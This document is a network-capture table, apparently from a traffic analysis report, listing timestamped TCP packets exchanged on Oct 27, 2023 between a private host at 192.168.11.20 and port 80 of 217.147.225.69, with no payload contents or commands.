                                                                                                                                              Oct 27, 2023 16:20:27.049668074 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.049721003 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.049762964 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.049777031 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.049818039 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.049846888 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.049860954 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.049906969 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.049976110 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.050039053 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.050035000 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.050035954 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.050093889 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.050112963 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.050112963 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.050164938 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.050220966 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.050251007 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.050251007 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.050276995 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.050307989 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.050348043 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.050403118 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.050457954 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.050467014 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.050514936 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.050528049 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.050581932 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.050642967 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.050653934 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.050653934 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.050705910 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.050760031 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.050810099 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.050810099 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.050826073 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.050868034 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.050882101 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.050936937 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.051002026 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.051002026 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.051011086 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.051059008 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.051073074 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.051126957 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.051168919 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.051168919 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.051193953 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.051249981 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.051305056 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.051336050 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.051369905 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.051386118 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.051386118 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.051428080 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.051484108 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.051515102 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.051553965 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.051608086 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.051665068 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.051671028 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.051665068 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.051723003 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.051728964 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.051783085 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.051826954 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.051851034 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.051906109 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.051911116 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.051944971 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.051964998 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.052048922 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.052048922 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.052077055 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.052104950 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.052139044 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.052207947 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.052263021 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.052269936 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.052316904 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.052318096 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.052385092 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.052422047 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.052422047 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.052440882 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.052479029 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.052495956 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.052553892 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.052561045 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.052614927 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.052659035 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.052670002 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.052736044 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.052737951 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.052771091 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.052793026 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.052855968 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.052867889 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.052903891 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.052916050 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.052969933 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.052992105 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.053028107 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.053035975 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.053093910 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.053097963 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.053128958 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.053152084 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.053217888 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.053219080 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.053251982 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.053273916 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.053323984 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.053328037 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.053373098 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.053396940 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.053421974 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.053452015 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.053493023 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.053505898 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.053575039 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.053596973 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.053628922 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.053647041 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.053682089 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.053725958 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.053735971 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.053754091 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.053771019 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.053788900 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.053802013 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.053802013 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.053806067 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.053822994 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.053841114 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.053900003 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.053900003 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.053900003 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.053947926 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.053997993 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.053997993 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.357448101 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.357569933 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.357640028 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.357711077 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.357723951 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.357777119 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.357789993 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.357870102 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.357913971 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.357939005 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.357971907 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.358014107 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.358100891 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.358175039 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.358179092 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.358236074 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.358262062 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.358325005 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.358390093 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.358390093 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.358403921 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.358469009 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.358552933 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.358566046 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.358566046 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.358566046 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.358623028 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.358661890 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.358695984 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.358769894 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.358833075 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.358840942 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.358912945 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.358920097 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.358975887 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.359056950 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.359062910 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.359122038 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.359122038 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.359123945 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.359189987 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.359266996 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.359323025 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.359329939 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.359323025 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.359390974 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.359411001 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.359477043 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.359509945 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.359509945 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.359549999 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.359576941 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.359622002 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.359683037 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.359713078 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.359713078 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.359761953 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.359800100 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.359828949 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.359906912 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.359918118 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.359918118 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.359977961 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.359983921 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.360106945 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.360110044 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.360187054 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.360260963 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.360265970 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.360316038 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.360331059 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.360404968 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.360447884 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.360449076 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.360475063 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.360517025 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.360538960 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.360618114 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.360632896 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.360682011 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.360687971 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.360764980 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.360805988 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.360806942 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.360836029 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.360877037 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.360908985 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.360956907 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.360981941 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.361013889 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.361043930 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.361104012 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.361119986 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.361185074 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.361228943 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.361264944 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.361334085 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.361351967 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.361351967 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.361402988 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.361469030 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.361474991 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.361536980 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.361572027 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.361613989 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.361668110 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.361680031 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.361711025 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.361754894 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.361798048 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.361826897 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.361890078 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.361926079 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.361926079 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.361968994 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.362019062 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.362035036 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.362067938 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.362102032 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.362114906 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.362122059 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.362139940 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.362158060 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.362175941 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.362194061 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.362195015 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.362211943 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.362230062 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.362251997 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.362271070 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.362283945 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.362283945 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.362289906 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.362308025 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.362325907 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.362333059 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.362333059 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.362344027 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.362380981 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.362415075 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.362418890 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.362420082 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.362421989 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.362431049 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.362431049 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.362431049 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.362442017 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.362461090 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.362478971 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.362478971 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.362497091 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.362577915 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.362577915 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.362577915 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.362582922 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.362586021 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.362587929 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.362588882 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.362591028 CEST8049745217.147.225.69192.168.11.20
